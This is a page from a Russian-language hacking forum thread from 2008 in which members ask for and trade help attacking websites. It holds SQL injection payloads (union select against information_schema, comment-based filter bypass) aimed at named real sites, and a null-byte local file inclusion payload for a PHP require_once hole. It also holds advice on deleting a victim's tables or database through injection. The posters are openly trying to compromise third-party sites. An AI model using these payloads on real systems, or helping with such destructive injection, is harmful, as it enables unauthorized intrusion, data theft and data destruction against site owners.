Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    обновляю пост) по чуть чуть)
     
    #2101 sabe, 29 May 2008
    Last edited: 29 May 2008
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    На100ящий
    table_schema+from+information_schema.tables+where+table_name=... табличка
    советую почитать https://forum.antichat.ru/showpost.php?p=401199&postcount=17

    Жжошь чтоле? =\
    и кстате наверняка гет =(
     
    #2102 Constantine, 29 May 2008
    Last edited: 29 May 2008
    1 person likes this.
  3. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Sabe, а ты случайно админку не нашёл???))))
     
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Constantine
    обновил пост. пасс получил этим способом)
    пс: немножко подкурил..)
    На100ящий
    это я у тебя спрашиваю..) смысл взлома?)
     
    #2104 sabe, 29 May 2008
    Last edited: 7 Jun 2008
  5. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Constantine, спс за ссылку....будем знать!!!! всё, надо ложиться спать, а то завтра гос(((
     
  6. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Sabe, пока учимся....))))
     
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    ну я тоже пока учусь..)

    хсс+
     
    #2107 sabe, 29 May 2008
    Last edited: 29 May 2008
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    /index.php?p=-1+union+select+1,2,unhex(hex(table_name))+from+INFORMATION_SCHEMA.TABLES/*
    или так
     
    _________________________
  9. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    ребята это инфо что то дает мне? есть толк от этой инфо?

     
    #2109 1SeTh, 29 May 2008
    Last edited: 29 May 2008
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    забей он просто упал)) как встанет почекаем на скуль..)

    http://www.bladeauction.com/index.php
     
  11. nightmare007

    nightmare007 New Member

    Joined:
    28 Oct 2006
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    вот у мя тут созрел пост:

    значит рассматривается cms wow-ultimate...

    при запросе
    если ввести в name каконить брет, типа (ghj) то выдается:

    это говрит о том что при запросе подгружается модуль из папки "modules" ,выполняется подгрузка с помощью функции require_once() которая прописана в файле "Z:\home\site\www\templates\wolk\block-center.php"

    block-center.php:
    PHP:
    <?php
    if (!$menu = &$_GET['page']) 
    $menu=$main_page;
    print 
    "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
    <td width=\"100%\" valign=\"top\" align=\"center\" >"
    ;
    require_once(
    "modules/$menu.php");
    print 
    "</td></tr></table>";

    ?>
    из кода можно увидеть что модуль вызывается посредствам подстановки переменой "$menu" в функцию
    PHP:
    require_once("modules/$menu.php")
    терь собсно вапрос:
    я читал что с помощью уязвимой функции require_once можно инклюдить php файлы с разными нихарошими кодами... можноли здесь чонить придумать :?
     
  12. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Помогите раскрутить

    Всем привет!
    Помогите раскрутить:
    http://www.e1.ru/wap/tv/index.php?p_id=107/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3/*

    Похоже что есть apache security_mod, либо что-то самописное, не пропускает "FROM", сломал весь мозг :mad: :mad: :mad:

    PS:понадобится wml browser.
     
  13. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    2 nightmare007

    попробуй вот так, может прокатит:
    Code:
    http://site/index.php?menu=с:/boot.ini%00
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Эм... а на мои вопросы не ответили(
     
  15. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    каким запром при mysql-inj удалить таблицу/базу данных?

    это не катит
     
  16. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    в контексте "SELECT" никак.
     
  17. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0

    и как быть тогда?
    как удалить таблицу/базу данных??
     
  18. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    http://www.mysql.ru/docs/ - хороший сайт
    DELETE FROM mag - удалить все записи из mag;
     
  19. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    если не разделить DROP и SELECT то никак.
     
  20. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Разве DELETE можно выполнить в контексте SELECT? ;)
    Можно конечно запихнуть в хранимую функцию и использовать ее в SELECT.
     
    #2120 z3r0cool, 29 May 2008
    Last edited: 29 May 2008
Thread Status:
Not open for further replies.